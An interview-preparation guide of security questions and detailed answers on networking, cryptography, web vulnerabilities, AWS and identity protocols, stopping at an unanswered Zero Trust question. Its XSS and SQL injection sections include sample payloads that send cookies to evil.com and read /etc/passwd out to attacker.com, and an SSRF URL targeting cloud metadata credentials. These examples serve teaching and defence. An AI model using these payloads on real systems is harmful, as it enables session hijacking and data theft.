Security Mastery — Principal-Level Interview Q&A

120+ questions covering the depth and breadth expected at Staff/Principal/Distinguished security engineer levels. Each answer is written at the density a hiring panel expects — no fluff, no hedging.

1. Network Security Fundamentals

Q1.1: Walk through what happens when you type `https://example.com` into a browser, focusing on the security-relevant steps.

A: (1) Browser checks HSTS preload list — if present, forces HTTPS before any network call. (2) DNS resolution: stub resolver checks local cache, then recursive resolver. DNSSEC validation occurs if configured, verifying RRSIG records up the chain of trust. (3) TCP three-way handshake: SYN, SYN-ACK, ACK — source port ephemeral (49152-65535), destination port 443. (4) TLS 1.3 handshake: ClientHello (supported cipher suites, key shares via X25519 or P-256), ServerHello (chosen cipher, server key share, encrypted extensions, certificate, CertificateVerify via signature, Finished). In TLS 1.3 this is 1-RTT (vs 2-RTT in TLS 1.2). (5) Certificate validation: browser checks certificate chain to a trusted root CA, verifies signatures, checks validity period, checks Certificate Transparency (CT) logs for the cert, checks OCSP stapling or CRL for revocation. (6) Symmetric session keys derived via HKDF from the ECDHE shared secret. (7) HTTP request sent encrypted. (8) Response includes security headers: Strict-Transport-Security, Content-Security-Policy, X-Content-Type-Options: nosniff, X-Frame-Options.

Security implications at each layer: DNS is vulnerable to spoofing without DNSSEC; TCP to SYN floods and RST injection; TLS to downgrade attacks (mitigated by HSTS); certificates to CA compromise (mitigated by CT and pinning); HTTP to injection attacks (mitigated by CSP).

Q1.2: Explain the difference between TCP and UDP. When would you choose one over the other from a security perspective?

A: TCP is connection-oriented (SYN/SYN-ACK/ACK handshake), guarantees ordered delivery via sequence numbers, implements congestion control. UDP is connectionless — fire-and-forget datagrams with no delivery guarantee.

Security considerations: TCP's sequence numbers prevent trivial injection (but predictable ISNs were historically exploitable). TCP's state machine makes SYN flood attacks possible (half-open connections exhaust server resources — mitigated by SYN cookies). UDP's connectionless nature makes source IP spoofing trivial (no handshake to verify), enabling amplification attacks (DNS, NTP, memcached reflection). UDP is used for DNS (port 53, < 512 bytes), DHCP (67/68), NTP (123), QUIC (443).

When to choose: Use TCP when you need reliable delivery and can't tolerate data loss (HTTP, database connections). Use UDP when latency matters more than reliability (real-time streaming, gaming, DNS queries). QUIC (UDP-based) gives you TCP-like reliability with TLS 1.3 baked in and 0-RTT resumption.

Q1.3: How does DNS exfiltration work and how do you detect it?

A: Attacker encodes stolen data as subdomain labels: base64encodeddata.c2domain.com. Each DNS query leaks up to ~253 bytes (label limit 63 chars, total name limit 253). Queries traverse normal DNS infrastructure to the attacker's authoritative nameserver for c2domain.com.

Detection: (1) Monitor for unusually long subdomain labels (entropy analysis). (2) Volume of unique subdomain queries to a single domain. (3) TXT record queries of unusual size. (4) DNS queries to recently registered or low-reputation domains. (5) DNS queries at unusual frequencies. (6) Queries bypassing internal resolvers (direct queries to external DNS on port 53). Tools: passive DNS monitoring, Zeek DNS logs, Sigma rules on DNS query length thresholds.

Prevention: Force all DNS through internal resolvers (block outbound port 53/853). Deploy DNS filtering. Monitor for DoH/DoT bypass.

Q1.4: Explain ARP spoofing. What is the blast radius and how do you mitigate it?

A: ARP maps IP addresses to MAC addresses on Layer 2. ARP has no authentication — any host can send gratuitous ARP replies claiming to own any IP. Attacker sends forged ARP replies mapping the gateway's IP to the attacker's MAC, becoming a man-in-the-middle for all LAN traffic.

Blast radius: Entire broadcast domain (VLAN/subnet). All hosts update their ARP cache with the poisoned entry.

Mitigations: (1) Dynamic ARP Inspection (DAI) on managed switches — validates ARP packets against DHCP snooping binding table. (2) Static ARP entries for critical infrastructure (gateways). (3) 802.1X port-based NAC to authenticate devices before network access. (4) Network segmentation via VLANs to limit broadcast domains. (5) ARP monitoring tools (arpwatch). (6) In cloud/SDN: ARP spoofing is typically prevented by the hypervisor's virtual switch.

Q1.5: What is the difference between a router, a switch, and a firewall? Where does each sit in a defense-in-depth architecture?

A: Switch (Layer 2): Forwards frames based on MAC address table. Managed switches support VLANs, port security, 802.1X. Sits at the access layer. Router (Layer 3): Forwards packets between networks based on routing table. Implements ACLs, can do basic packet filtering. Sits at distribution/core layer. Firewall (Layer 3-7): Stateful packet inspection, application-layer filtering, NAT. Next-gen firewalls (NGFW) add IPS, URL filtering, TLS inspection, application identification. Sits at network perimeter, internal segmentation points, and cloud VPC boundaries.

Defense-in-depth placement: Internet → Edge firewall/WAF → DMZ → Internal firewall → Internal segmentation firewalls between zones → Host-based firewalls. Switches enforce microsegmentation at Layer 2. Routers enforce routing policy and ACLs between segments.

Q1.6: Explain subnetting. How does it relate to security?

A: Subnetting divides a network into smaller broadcast domains using subnet masks. A /24 (255.255.255.0) gives 254 usable hosts. A /28 gives 14 usable hosts.

Security relevance: (1) Network segmentation — isolate sensitive assets (databases, management interfaces) into small subnets. (2) ACLs and firewall rules are applied at subnet boundaries. (3) Smaller subnets reduce blast radius of ARP spoofing, broadcast storms, and lateral movement. (4) Principle of least privilege at the network layer — hosts should only reach what they need. (5) In cloud: VPC subnets (public vs private) determine internet reachability. Private subnets with NAT gateways prevent inbound internet access while allowing outbound.

Q1.7: What is the difference between IDS and IPS? What are the detection modes?

A: IDS (Intrusion Detection System) passively monitors traffic and generates alerts — inline or via SPAN/mirror port. IPS (Intrusion Prevention System) sits inline and can block/drop malicious traffic in real time.

Detection modes: (1) Signature-based: Pattern matching against known attack signatures (Snort rules, Suricata). Fast, low false positives for known attacks, blind to zero-days. (2) Anomaly-based: Establishes baseline of normal behavior, alerts on deviations. Catches zero-days but generates false positives. (3) Stateful protocol analysis: Validates traffic against expected protocol behavior (e.g., HTTP request should follow HTTP grammar). (4) Heuristic/behavioral: Combines multiple indicators to identify malicious intent.

Deployment: Network-based (NIDS/NIPS) at network choke points. Host-based (HIDS/HIPS) on endpoints (OSSEC, Wazuh). Cloud-based (VPC flow logs + GuardDuty, Azure Sentinel).

2. Cryptography

Q2.1: Explain the difference between symmetric and asymmetric encryption. Why do we use both in TLS?

A: Symmetric (AES, ChaCha20): Same key encrypts and decrypts. Fast (~1000x faster than asymmetric). Problem: key distribution — how do two parties agree on a shared secret over an untrusted channel? Asymmetric (RSA, ECDSA, Ed25519): Mathematically related key pair — public key encrypts, private key decrypts (or private signs, public verifies). Solves key distribution but is computationally expensive.

TLS uses both: Asymmetric for key exchange and authentication (ECDHE for ephemeral key agreement, RSA/ECDSA for server certificate signature verification). This establishes a shared secret. Symmetric (AES-256-GCM or ChaCha20-Poly1305) for bulk data encryption using keys derived from that shared secret via HKDF. This gives you the best of both: secure key exchange + fast data encryption.

Q2.2: What is Perfect Forward Secrecy (PFS) and why does it matter?

A: PFS ensures that compromise of long-term keys (e.g., the server's private key) does not compromise past session keys. Achieved by using ephemeral Diffie-Hellman (DHE or ECDHE) key exchange — each session generates a new random key pair, computes the shared secret, then discards the ephemeral private key.

Why it matters: Without PFS (e.g., RSA key exchange in TLS 1.2), an attacker who records encrypted traffic and later steals the server's private key can decrypt all past sessions. With PFS, each session's key is independent — stealing the long-term key only lets you impersonate the server going forward, not decrypt past traffic.

TLS 1.3 mandates PFS — only ECDHE and DHE key exchanges are supported. RSA key exchange was removed entirely.

Q2.3: Explain hashing vs. encryption vs. encoding. When do you use each?

A: Hashing (SHA-256, BLAKE3): One-way function producing fixed-length digest. Deterministic, irreversible, collision-resistant. Use for: password storage (with KDF), data integrity verification, digital signatures (hash-then-sign), deduplication, HMAC. Encryption (AES, RSA): Reversible transformation requiring a key. Use for: protecting data confidentiality at rest and in transit. Encoding (Base64, URL encoding, hex): Reversible format transformation with no key. Provides zero security — only format compatibility.

Critical mistake to flag: Encoding is not encryption. Base64 is not a security measure. Hashing is not encryption (you cannot "decrypt" a hash). MD5 and SHA-1 are broken for collision resistance — never use for security-critical applications.

Q2.4: How should passwords be stored? Walk through the full chain.

A: Never store plaintext or simple hashes. Use a key derivation function (KDF) designed for password hashing:

Argon2id (winner of Password Hashing Competition) — preferred. Resistant to GPU/ASIC attacks via memory-hardness. Parameters: memory cost (64MB+), iterations (3+), parallelism (1+).
bcrypt — well-proven, 72-byte input limit. Cost factor 10+ (2^10 iterations).
scrypt — memory-hard, but harder to tune correctly than Argon2id.

Chain: User provides password → generate cryptographically random salt (16+ bytes) → feed password + salt into KDF with tuned work factor → store algorithm$parameters$salt$hash. On login: retrieve stored record, extract salt and parameters, hash provided password with same parameters, constant-time compare.

What NOT to do: MD5/SHA-1/SHA-256 alone (too fast — billions per second on GPU). Single round of any hash. Static/shared salt. PBKDF2 with low iteration count (minimum 600,000 for SHA-256 per OWASP 2023).

Q2.5: What is a Key Derivation Function (KDF) and what are the different types?

A: KDF derives one or more cryptographic keys from a source of key material.

Password-based KDFs (slow by design): Argon2id, bcrypt, scrypt, PBKDF2. Designed to be computationally expensive to resist brute-force. Used for: password hashing, deriving encryption keys from passphrases (LUKS disk encryption uses PBKDF2/Argon2id).

Extract-and-expand KDFs (fast): HKDF (HMAC-based). Two phases: Extract (concentrate entropy from input into a fixed-length pseudorandom key) and Expand (generate multiple keys from that PRK). Used in TLS 1.3 to derive handshake keys, application keys, resumption keys from the ECDHE shared secret.

Why it matters: Using a fast hash (SHA-256) directly as a KDF for passwords is catastrophic — attacker can try billions per second. Using a slow KDF (bcrypt) for TLS key derivation would destroy performance. Match the KDF to the threat model.

Q2.6: Explain PKI. What happens when a CA is compromised?

A: Public Key Infrastructure establishes trust through a hierarchy of Certificate Authorities (CAs). Root CAs (self-signed, stored in OS/browser trust stores) sign intermediate CA certificates. Intermediate CAs sign end-entity (server/client) certificates. Certificate contains: subject, public key, issuer, validity period, extensions (SANs, key usage), signature from issuing CA.

CA compromise (e.g., DigiNotar 2011): Attacker with CA private key can issue valid certificates for any domain. Impact: trusted MITM attacks against any site. Mitigations: (1) Certificate Transparency (CT): All issued certs must be logged in append-only public logs. Domain owners monitor CT logs for unauthorized certs (Google/Facebook do this). Browsers reject certs not in CT logs. (2) CAA records: DNS records specifying which CAs are authorized to issue certs for a domain. (3) Short-lived certificates (Let's Encrypt: 90 days) reduce window of compromise. (4) OCSP stapling and CRL for revocation. (5) Certificate pinning (deprecated for web, still used in mobile apps) — hardcode expected cert/public key. (6) Remove compromised CA from trust stores (browser vendors did this to DigiNotar).

Q2.7: What is the difference between Diffie-Hellman and RSA key exchange?

A: RSA key exchange (removed in TLS 1.3): Client generates random pre-master secret, encrypts with server's RSA public key, sends to server. Server decrypts with private key. Problem: no PFS — if server's private key is compromised, all past sessions are decryptable.

Diffie-Hellman (DH/ECDHE): Both parties contribute to the shared secret. Each generates ephemeral keypair, exchanges public values. Both independently compute the same shared secret from their private key + other's public key. Even an eavesdropper who sees both public values cannot compute the shared secret (discrete logarithm problem). Provides PFS because ephemeral keys are discarded after session.

ECDHE vs DHE: ECDHE uses elliptic curves (X25519, P-256) — smaller keys, faster computation. 256-bit ECDHE ≈ 3072-bit DHE in security strength. ECDHE is the standard for TLS 1.3.

Q2.8: What are block cipher modes of operation? Which should you use?

A: Block ciphers (AES) encrypt fixed-size blocks (128 bits for AES). Modes define how to handle messages longer than one block.

ECB (Electronic Codebook): Each block encrypted independently. Catastrophically insecure — identical plaintext blocks produce identical ciphertext blocks (the famous "ECB penguin"). Never use.

CBC (Cipher Block Chaining): Each block XORed with previous ciphertext block before encryption. Requires IV. Vulnerable to padding oracle attacks (POODLE, Lucky13). Requires separate MAC (encrypt-then-MAC). Legacy — avoid for new designs.

CTR (Counter): Turns block cipher into stream cipher. Encrypts counter values, XORs with plaintext. Parallelizable. No padding needed. Requires unique nonce per message. No built-in integrity.

GCM (Galois/Counter Mode): CTR + GMAC authentication. Recommended for most use cases. Provides authenticated encryption (confidentiality + integrity). AES-256-GCM is the standard for TLS 1.3. Caveat: nonce reuse is catastrophic (leaks auth key).

ChaCha20-Poly1305: Stream cipher + MAC. Alternative to AES-GCM. Faster in software (no AES-NI hardware), constant-time by design. Used by TLS 1.3 as alternative cipher suite. Preferred on mobile/embedded without AES hardware acceleration.

Q2.9: What is HMAC and why is it better than `hash(key || message)`?

A: HMAC (Hash-based Message Authentication Code) = H((K' ⊕ opad) || H((K' ⊕ ipad) || message)). Two nested hash computations with padded key.

Why not hash(key || message): Vulnerable to length extension attacks with Merkle-Damgard hashes (SHA-256, SHA-512). Attacker who knows H(key || message) can compute H(key || message || padding || attacker_data) without knowing the key. This breaks integrity guarantees.

Why not hash(message || key): Vulnerable if the hash function has collisions — attacker finds two messages with same hash, both validate.

HMAC's design prevents both attacks through the double-hashing structure with inner and outer padding. It's provably secure as a PRF if the underlying hash is collision-resistant. Used in: TLS (key derivation, finished messages), JWT signatures (HS256), API authentication (AWS Signature V4).

3. Application Security

Q3.1: Walk through the OWASP Top 10 2025. What changed and why?

A: The 2025 update reshuffles and introduces new categories reflecting the evolving threat landscape:

A01 Broken Access Control — Still #1. Includes IDOR, missing function-level access control, CORS misconfiguration, metadata manipulation. Most common finding in real-world testing.
A02 Security Misconfiguration — Moved up. Default credentials, unnecessary features enabled, overly permissive cloud IAM, missing security headers, verbose error messages.
A03 Software Supply Chain Failures — NEW. Dependency confusion, typosquatting, compromised CI/CD pipelines, malicious packages (SolarWinds, codecov, xz-utils backdoor). Reflects the industry's growing attack surface in build systems.
A04 Cryptographic Failures — Weak algorithms, missing encryption, hardcoded keys, poor key management, missing TLS.
A05 Injection — SQL, NoSQL, OS command, LDAP, XSS (now folded in). Mitigated by parameterized queries, input validation, output encoding.
A06 Insecure Design — Missing threat modeling, insecure design patterns, missing business logic controls. Cannot be fixed by perfect implementation — the design itself is flawed.
A07 Authentication Failures — Credential stuffing, weak passwords, missing MFA, session fixation.
A08 Software or Data Integrity Failures — Insecure deserialization, unsigned updates, CI/CD integrity gaps.
A09 Security Logging and Alerting Failures — Missing audit logs, no alerting on suspicious activity, logs not protected from tampering.
A10 Mishandling of Exceptional Conditions — NEW title. Error handling that leaks information, fails open, or creates exploitable states.

Key shift: Supply chain entered the list, reflecting real-world attack trends. XSS folded into injection.

Q3.2: Explain XSS types and their mitigations.

A: Reflected XSS: Payload in request (URL parameter) reflected in response without encoding. Requires victim to click crafted link. Example: search?q=<script>document.location='http://evil.com/?c='+document.cookie</script>.

Stored XSS: Payload persisted (database, file). Every user viewing the content gets hit. Higher impact — no social engineering needed. Example: malicious comment in a forum.

DOM-based XSS: Payload never reaches server. Client-side JavaScript reads attacker-controlled input (fragment, URL parameter) and writes it to DOM unsafely (.innerHTML, document.write, eval).

Mitigations: (1) Output encoding — context-aware: HTML entity encoding for HTML body, JavaScript encoding for JS context, URL encoding for URLs. (2) Content Security Policy (CSP) — script-src 'self' blocks inline scripts and eval. Use nonces or hashes for required inline scripts. (3) httponly cookie flag prevents JavaScript access to session cookies. (4) X-Content-Type-Options: nosniff prevents MIME-type sniffing. (5) DOMPurify for HTML sanitization in DOM context. (6) Avoid dangerous sinks (.innerHTML, eval, document.write).

Q3.3: Explain CSRF and why SameSite cookies changed the landscape.

A: CSRF: Attacker tricks authenticated user's browser into making an unintended request to a target site. Browser automatically includes cookies. Example: <img src="https://bank.com/transfer?to=attacker&amount=10000">.

Traditional mitigations: Synchronizer token pattern (unique token per session/form, validated server-side). Double-submit cookie pattern. Origin/Referer header checking.

SameSite cookies changed everything: SameSite=Lax (now default in modern browsers) prevents cookies from being sent with cross-origin subresource requests (images, iframes, forms). Cookies are only sent on same-site navigational requests (top-level GET). SameSite=Strict blocks cookies on all cross-site requests. SameSite=None; Secure explicitly allows cross-site (requires HTTPS).

Impact: With SameSite=Lax as browser default, most CSRF attacks are blocked without any application-level tokens. However, CSRF tokens remain important for: (1) supporting older browsers, (2) protecting against same-site attacks (subdomain takeover), (3) POST-based state changes where Lax still allows navigational GETs.

Q3.4: What is SSRF and how do you prevent it?

A: Server-Side Request Forgery: Attacker makes the server send requests to unintended destinations — typically internal services, cloud metadata endpoints, or internal APIs.

Classic attack: Application fetches URL from user input (/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/role) — retrieves AWS IAM credentials from the metadata service.

Impact: Access to internal services behind firewall, cloud credential theft (IMDS), port scanning internal network, reading internal files via file:// protocol.

Prevention: (1) Allowlist approach — only allow specific domains/IPs. (2) Block private/internal IP ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16, 169.254.169.254, fd00::/8). (3) Disable unnecessary URL schemes (block file://, gopher://, dict://). (4) Use IMDSv2 on AWS (requires PUT with TTL-1 token — stops SSRF from metadata theft). (5) DNS rebinding prevention — resolve DNS, validate IP, then connect (don't resolve twice). (6) Network-level controls — firewall rules preventing application servers from reaching metadata endpoint. (7) Run URL-fetching services in isolated network segments with no access to internal resources.

Q3.5: Explain SQL injection. What are the variants and how do you prevent it?

A: Application constructs SQL queries by concatenating user input: "SELECT * FROM users WHERE id = '" + input + "'". Attacker input: ' OR 1=1 -- returns all users.

Variants: (1) Union-based: ' UNION SELECT username, password FROM users -- — appends attacker query results to legitimate output. (2) Error-based: Malformed queries trigger error messages revealing database structure. (3) Blind Boolean: ' AND 1=1 -- (true) vs ' AND 1=2 -- (false) — infer data bit by bit from response differences. (4) Blind Time-based: ' AND SLEEP(5) -- — infer data from response time. (5) Second-order: Payload stored in database, triggered when used in a different query later. (6) Out-of-band: ' UNION SELECT load_file('/etc/passwd') INTO OUTFILE '\\\\attacker.com\\share' -- — exfiltrate via DNS/HTTP.

Prevention: (1) Parameterized queries / prepared statements — the ONLY reliable defense. Query structure and data are sent separately to the database engine. (2) ORM frameworks (SQLAlchemy, Hibernate) use parameterized queries internally. (3) Input validation as defense-in-depth (not primary defense). (4) Least privilege database accounts — application should never connect as sa/root. (5) WAF rules as detection layer, not prevention. (6) Stored procedures — help if they use parameterized internals, hurt if they concatenate.

Q3.6: What is insecure deserialization and why is it dangerous?

A: Deserialization converts byte streams back into objects. If attacker controls the serialized data, they can manipulate object state or trigger code execution through "gadget chains" — sequences of existing class methods that chain together during deserialization to achieve arbitrary code execution.

Examples: Java's ObjectInputStream is notoriously dangerous — libraries like Commons Collections contain gadget chains that give RCE (exploited by ysoserial). Python's pickle executes arbitrary code via __reduce__. PHP's unserialize with magic methods (__wakeup, __destruct).

Impact: Remote code execution, authentication bypass, privilege escalation, DoS.

Prevention: (1) Don't deserialize untrusted data. (2) Use format-restricted serialization (JSON, protobuf) instead of native object serialization. (3) If you must deserialize: integrity checks (HMAC signature on serialized data), allowlist of permitted classes, isolate deserialization in sandboxed environments. (4) Monitor deserialization endpoints for anomalous payloads.

Q3.7: How would you conduct a security code review?

A: Approach: Start with threat model to prioritize areas of code. Focus on trust boundaries — where user input enters, where data crosses privilege boundaries, where authentication/authorization decisions are made.

Priority checklist: (1) Authentication/authorization: How are sessions created? Where are authz checks enforced? Is there a centralized enforcement point or scattered checks? (2) Input handling: Trace every user input from entry to use. Look for unsanitized input reaching SQL, OS commands, file paths, HTML output, LDAP queries. (3) Cryptography: Hardcoded keys/secrets, weak algorithms (MD5, SHA1, DES), ECB mode, missing IVs, predictable random number generators (Math.random() for security purposes). (4) Error handling: Stack traces in responses, fail-open logic, exception swallowing. (5) Dependencies: Known vulnerable versions (SCA tools: Snyk, Dependabot). (6) Secrets: API keys, passwords, tokens in code (trufflehog, git-secrets). (7) Race conditions: TOCTOU bugs, non-atomic check-then-act. (8) Business logic: Can workflows be skipped? Can prices be manipulated? Can rate limits be bypassed?

Tools: SAST (Semgrep, CodeQL, SonarQube), SCA (Snyk, OSV-Scanner), secrets scanning (trufflehog, gitleaks).

Q3.8: What is the difference between SAST, DAST, IAST, and SCA?

A: SAST (Static Application Security Testing): Analyzes source code without executing it. Finds injection flaws, hardcoded secrets, insecure patterns. Tools: Semgrep, CodeQL, SonarQube, Checkmarx. Pros: early in SDLC, covers all code paths. Cons: high false positive rate, can't find runtime/config issues.

DAST (Dynamic Application Security Testing): Tests running application by sending crafted requests. Finds XSS, SQLi, SSRF, misconfigurations. Tools: OWASP ZAP, Burp Suite, Nuclei. Pros: finds real exploitable issues, low false positives. Cons: limited code coverage, only tests what it can reach.

IAST (Interactive AST): Agent inside the application monitors execution during testing. Correlates input to code execution to output. Tools: Contrast Security. Pros: low false positives, pinpoints exact code location. Cons: requires test execution, agent overhead.

SCA (Software Composition Analysis): Identifies vulnerable third-party dependencies. Tools: Snyk, Dependabot, OSV-Scanner, Trivy. Critical for supply chain security. Checks CVE databases and advisories.

Integrated approach: SAST + SCA in CI/CD pipeline (every PR). DAST in staging/pre-prod. IAST during QA testing. Secrets scanning as pre-commit hook.

4. Cloud Security

Q4.1: Explain the shared responsibility model. Where do most breaches occur?

A: Cloud provider secures "of the cloud" (physical infrastructure, hypervisor, network fabric, managed service internals). Customer secures "in the cloud" (data, IAM, application code, OS patching for IaaS, network configuration).

Responsibility shifts by service model: IaaS (EC2): Customer owns OS, patches, firewall rules, data. PaaS (RDS, Lambda): Provider owns OS/runtime, customer owns code, data, IAM. SaaS (Office 365): Provider owns almost everything, customer owns data, access control, configuration.

Where breaches actually occur: Almost always in the customer's responsibility scope. (1) Misconfigured IAM — overprivileged roles, long-lived access keys, no MFA (Capital One 2019: SSRF + overprivileged IAM role). (2) Exposed storage — public S3 buckets, Azure blobs (hundreds of major breaches). (3) Misconfigured security groups — databases open to 0.0.0.0/0. (4) Missing encryption — data at rest unencrypted, no TLS for internal traffic. (5) Credential leaks — AWS keys in GitHub repos (automated scraping takes minutes).

Q4.2: An AWS access key is leaked on GitHub. Walk through your response.

A: Immediate (0-5 minutes): (1) Disable the access key in IAM console (don't delete — need for forensics). (2) Check if the key has an associated IAM user or role. (3) Review the user/role's attached policies to understand blast radius.

Investigation (5-60 minutes): (4) Pull CloudTrail logs filtered by the access key ID. Identify: what regions, what services, what API calls were made. Look for: CreateUser, CreateAccessKey, CreateLoginProfile (persistence), RunInstances (crypto mining), PutBucketPolicy (data exfiltration), AssumeRole (lateral movement). (5) Check for new IAM users, roles, or policies created by the compromised key. (6) Check for Lambda functions, EC2 instances, or ECS tasks launched.

Containment: (7) Revoke all sessions for the IAM user (aws iam put-user-policy with explicit deny). (8) Rotate all secrets the compromised key could have accessed. (9) Delete any persistence mechanisms (backdoor IAM users, roles, Lambda functions). (10) Review S3 access logs for data exfiltration.

Post-incident: (11) Implement SCPs preventing key creation without MFA. (12) Deploy automated secret scanning (GitHub Advanced Security, trufflehog in CI/CD). (13) Move to IAM roles with temporary credentials instead of long-lived access keys.

Q4.3: How do you design network isolation in AWS?

A: VPC architecture: (1) Public subnets: Only for load balancers and bastion hosts (if any). Internet Gateway attached. Resources get public IPs. (2) Private subnets: Application servers, databases. No Internet Gateway. Outbound via NAT Gateway (for updates/API calls) or VPC endpoints (preferred). (3) Isolated subnets: No outbound internet. For databases, sensitive workloads. Access only via VPC endpoints or peering.

Security groups (stateful): Instance-level firewalls. Default deny inbound. Reference other security groups instead of IP ranges (e.g., "allow port 5432 from app-sg"). No explicit deny rules — use NACLs for that.

NACLs (stateless): Subnet-level. Support allow and deny. Evaluate rules in order. Use for: blocking known bad IPs, additional subnet-level controls.

Advanced isolation: (4) VPC endpoints (Gateway for S3/DynamoDB, Interface for everything else) — traffic stays on AWS backbone, never traverses internet. (5) PrivateLink for service-to-service communication. (6) Transit Gateway for hub-and-spoke multi-VPC architecture. (7) AWS Network Firewall for stateful inspection between VPCs. (8) VPC Flow Logs to CloudWatch/S3 for network monitoring.

Zero trust overlay: Even within a VPC, use mutual TLS (mTLS) between services. Don't trust the network — authenticate every connection.

Q4.4: What are the most critical AWS IAM security controls?

A: (1) Root account lockdown: MFA (hardware key), no access keys, use only for account-level operations, monitor with CloudTrail alert. (2) Least privilege: Start with zero permissions, add only what's needed. Use IAM Access Analyzer to identify unused permissions. Use permission boundaries to cap maximum permissions. (3) Temporary credentials: IAM roles with STS AssumeRole instead of long-lived access keys. EC2 instance profiles, ECS task roles, Lambda execution roles. (4) MFA everywhere: Enforce MFA for console access and sensitive API calls (via condition keys in policies). (5) Service Control Policies (SCPs): Organization-level guardrails. Deny actions across all accounts (e.g., deny disabling CloudTrail, deny leaving organization, deny creating IAM users without MFA). (6) Cross-account access: Use roles with external IDs, not shared credentials. (7) Conditions in policies: aws:SourceIp, aws:PrincipalOrgID, aws:MultiFactorAuthPresent, aws:RequestedRegion to restrict access context. (8) Monitoring: CloudTrail + GuardDuty + IAM Access Analyzer continuous analysis.

Q4.5: Explain the IMDSv1 vs IMDSv2 difference and why it matters.

A: IMDSv1: Simple GET request to http://169.254.169.254/latest/meta-data/. Any process on the instance can access it. SSRF from web applications can reach it because it's a plain HTTP GET with no authentication.

IMDSv2: Requires a PUT request with X-aws-ec2-metadata-token-ttl-seconds header to get a session token, then use that token in subsequent GET requests. PUT requests have TTL=1 hop (cannot traverse proxies/NAT), and most SSRF payloads use GET/POST.

Why it matters: Capital One breach (2019) used SSRF to hit IMDSv1 and steal IAM role credentials. IMDSv2 would have prevented this because: (1) SSRF typically sends GET, not PUT. (2) Even if PUT is achievable, the hop limit prevents token retrieval through application-level proxying. (3) Custom header requirement blocks most SSRF frameworks.

Enforcement: Set HttpTokens=required on instances to disable IMDSv1 entirely. Use SCP to enforce IMDSv2-only across the organization.

5. Identity and Access Management

Q5.1: Explain OAuth 2.0 flows. When do you use which?

A: OAuth 2.0 delegates authorization (not authentication) — the client gets a token to access resources on behalf of the user.

Authorization Code Flow (with PKCE): For server-side and mobile/SPA apps. User redirected to authorization server, authenticates, gets authorization code via redirect. App exchanges code + PKCE code verifier for access token via back-channel. Use for: All modern applications. PKCE (Proof Key for Code Exchange) prevents authorization code interception.

Client Credentials Flow: Machine-to-machine. No user involved. Client authenticates directly with client_id + client_secret, gets access token. Use for: Service-to-service communication, background jobs, microservices.

Device Authorization Flow: For devices with limited input (smart TVs, CLI tools). Device displays code, user enters it on another device with full browser. Use for: IoT, CLI tools, TV apps.

Implicit Flow: DEPRECATED. Token returned directly in URL fragment. No back-channel exchange. Vulnerable to token leakage via browser history, referrer headers. Never use — replaced by Authorization Code + PKCE.

Resource Owner Password Flow: DEPRECATED. User gives username/password directly to the client. Defeats the purpose of OAuth (delegated access without sharing credentials). Only for migration from legacy systems.

Q5.2: What is the difference between OAuth and OIDC?

A: OAuth 2.0 is an authorization framework — it grants access tokens to clients to access protected resources. It does NOT define user identity or authentication.

OpenID Connect (OIDC) is an authentication layer built on top of OAuth 2.0. It adds: (1) ID Token — a JWT containing user identity claims (sub, email, name, iss, aud, exp). (2) UserInfo endpoint — returns additional user profile claims. (3) Standardized scopes (openid, profile, email). (4) Discovery — .well-known/openid-configuration endpoint for auto-configuration.

In practice: Use OIDC when you need to know WHO the user is (authentication). Use OAuth when you need to access resources on behalf of a user (authorization). Most modern implementations use both — OIDC for login, OAuth access tokens for API access.

Q5.3: Explain SAML. How does it differ from OIDC?

A: SAML 2.0 (Security Assertion Markup Language) is an XML-based SSO protocol. The Identity Provider (IdP) issues SAML assertions (XML documents) containing authentication statements, attribute statements, and authorization decision statements. Assertions are digitally signed with XML DSig.

SP-initiated flow: User visits Service Provider → SP generates AuthnRequest → Redirect to IdP → User authenticates → IdP sends SAML Response (containing signed Assertion) via POST binding to SP's ACS (Assertion Consumer Service) URL → SP validates signature, extracts attributes, creates session.

SAML vs OIDC: SAML is XML-based, verbose, primarily used in enterprise (Okta, Azure AD, ADFS). OIDC is JSON/JWT-based, lighter, used in modern web/mobile. SAML uses browser redirects and POST bindings; OIDC uses redirects and back-channel token exchange. OIDC is better for mobile/SPA (JWT is compact); SAML is better for legacy enterprise integration. Both solve SSO — OIDC is the modern choice for new implementations.

SAML vulnerabilities: XML signature wrapping attacks (moving the signed element while adding malicious content). XXE in SAML response parsing. Assertion replay if no InResponseTo validation.

Q5.4: What is the difference between RBAC and ABAC? When do you use each?

A: RBAC (Role-Based Access Control): Permissions assigned to roles, users assigned to roles. Simple, well-understood. Example: admin role has read, write, delete; viewer role has read. Works well when access patterns map cleanly to organizational roles.

ABAC (Attribute-Based Access Control): Access decisions based on attributes of the subject (user department, clearance), resource (classification, owner), action, and environment (time, location, device posture). Policies are rules: "Allow if user.department == resource.department AND user.clearance >= resource.classification AND time.hour BETWEEN 9 AND 17."

When RBAC breaks down: Role explosion — when you need "editor-for-project-A-in-region-US" and similar fine-grained combinations, you end up with thousands of roles. Cross-cutting concerns (time-based access, location restrictions) don't map to roles.

When to use which: RBAC for straightforward organizational hierarchies with clear role boundaries. ABAC when you need context-dependent, fine-grained access decisions. Most mature systems use both: RBAC for coarse-grained access + ABAC for fine-grained policy evaluation. AWS IAM is essentially ABAC — policies evaluate conditions on request attributes.

Q5.5: Explain Kerberos authentication. What are golden and silver ticket attacks?

A: Kerberos flow: (1) User authenticates to KDC (Key Distribution Center) with password → receives TGT (Ticket Granting Ticket) encrypted with krbtgt account hash. (2) User presents TGT to KDC to request service ticket (TGS) for specific service → KDC issues TGS encrypted with service account hash. (3) User presents TGS to service → service decrypts with its own hash, grants access.

Golden Ticket: Attacker obtains the krbtgt account's NTLM hash (via DCSync or domain controller compromise). Can forge TGTs for any user, including non-existent users, with any group membership, with any lifetime. Provides unrestricted access to the entire domain. Detection: Monitor for TGTs with abnormally long lifetimes, tickets for non-existent users, Kerberos authentication anomalies. Remediation: Reset krbtgt password TWICE (current and previous are both valid).

Silver Ticket: Attacker obtains a service account's NTLM hash. Can forge TGS tickets for that specific service. More targeted than golden tickets — only accesses the compromised service. Harder to detect because no KDC interaction (forged ticket goes directly to service). Detection: Monitor for Kerberos authentication without corresponding TGT request (Event ID 4769 without preceding 4768).

Kerberoasting: Request TGS for services with SPNs registered to user accounts, crack the ticket offline (encrypted with service account's password hash). Targets weak service account passwords. Mitigation: Long, random service account passwords (30+ chars), managed service accounts (gMSA), monitoring for bulk TGS requests.

Q5.6: What is Zero Trust? How do you actually implement it?

